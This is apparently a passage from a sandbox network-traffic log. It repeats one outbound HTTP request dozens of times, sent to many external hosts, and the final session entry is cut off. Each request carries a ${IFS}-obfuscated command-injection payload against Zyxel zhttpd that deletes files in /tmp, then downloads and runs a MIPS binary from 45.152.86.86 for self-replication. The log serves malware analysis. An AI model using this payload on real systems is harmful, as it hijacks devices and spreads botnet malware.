                              Mar 31, 2024 08:41:35.960599899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5550192.168.2.135225696.200.222.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960633993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5551192.168.2.1333984185.173.34.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960685968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5552192.168.2.1336696128.67.154.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960725069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5553192.168.2.1338478193.32.14.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960792065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5554192.168.2.1335672185.75.222.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960825920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5555192.168.2.134520050.231.233.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960869074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5556192.168.2.1338384189.200.92.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960912943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5557192.168.2.1337016142.182.6.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.960968018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5558192.168.2.1336416210.41.228.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961016893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5559192.168.2.134981465.66.103.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961054087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5560192.168.2.1350604106.191.0.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961075068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5561192.168.2.134259024.205.155.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961124897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5562192.168.2.1345822140.109.43.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961169004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5563192.168.2.1339314183.210.239.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961218119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5564192.168.2.1334062194.22.221.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961265087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5565192.168.2.134376272.68.213.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961319923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5566192.168.2.1343298150.6.111.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961374998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5567192.168.2.133444069.35.231.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961416960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5568192.168.2.1341436165.150.48.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961458921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5569192.168.2.1355032184.73.229.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961481094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5570192.168.2.1342922129.58.247.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961535931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5571192.168.2.135379860.155.57.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961585999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5572192.168.2.1354744131.225.118.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961620092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5573192.168.2.1344120170.217.162.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961667061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5574192.168.2.135650618.55.24.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961694956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5575192.168.2.135287634.60.35.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961745024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5576192.168.2.1348056184.28.6.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961788893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5577192.168.2.135089266.189.178.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961844921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5578192.168.2.1349080138.92.218.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961889982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5579192.168.2.1359754217.152.63.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961937904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5580192.168.2.134743234.185.101.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.961997986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5581192.168.2.135204459.88.95.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962034941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5582192.168.2.1334248138.130.121.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962083101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5583192.168.2.1360250135.6.242.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962104082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5584192.168.2.135273490.164.12.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962163925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5585192.168.2.1336436124.190.37.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962188005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5586192.168.2.133480657.125.48.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962239027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5587192.168.2.1359912189.118.178.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962270021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5588192.168.2.1345434179.198.13.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962342024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5589192.168.2.1333874181.44.153.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962362051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5590192.168.2.1336196148.209.114.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962429047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5591192.168.2.1342014115.148.116.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962459087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5592192.168.2.135006671.243.23.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962507010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5593192.168.2.1350156211.111.0.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962562084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5594192.168.2.134398493.18.255.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962625980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5595192.168.2.134170658.152.143.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962656021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5596192.168.2.1359476211.203.110.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962714911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5597192.168.2.1354284184.38.131.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962754965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5598192.168.2.1349266170.236.60.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962805033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5599192.168.2.1347246140.223.188.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962848902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5600192.168.2.1344678168.26.90.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962883949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5601192.168.2.1358116157.155.164.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962934971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5602192.168.2.135981657.179.30.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.962970018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5603192.168.2.134928295.2.126.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963017941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5604192.168.2.1340468134.219.211.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963057995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5605192.168.2.1337910141.166.161.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963109016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5606192.168.2.1333998144.11.121.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963169098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5607192.168.2.1360976180.194.53.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963180065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5608192.168.2.1336916212.52.109.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963232040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5609192.168.2.1333746174.58.24.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963287115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5610192.168.2.13552365.173.163.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963308096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5611192.168.2.1350196162.216.30.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963346958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5612192.168.2.133532285.23.113.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963408947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5613192.168.2.1339396184.244.228.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963458061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5614192.168.2.1345188128.155.236.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963493109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5615192.168.2.135427212.3.212.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963545084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5616192.168.2.133758682.132.152.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963573933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5617192.168.2.1337090197.62.137.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963623047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5618192.168.2.1337712174.165.148.142443
                              TimestampBytes transferredDirectionData
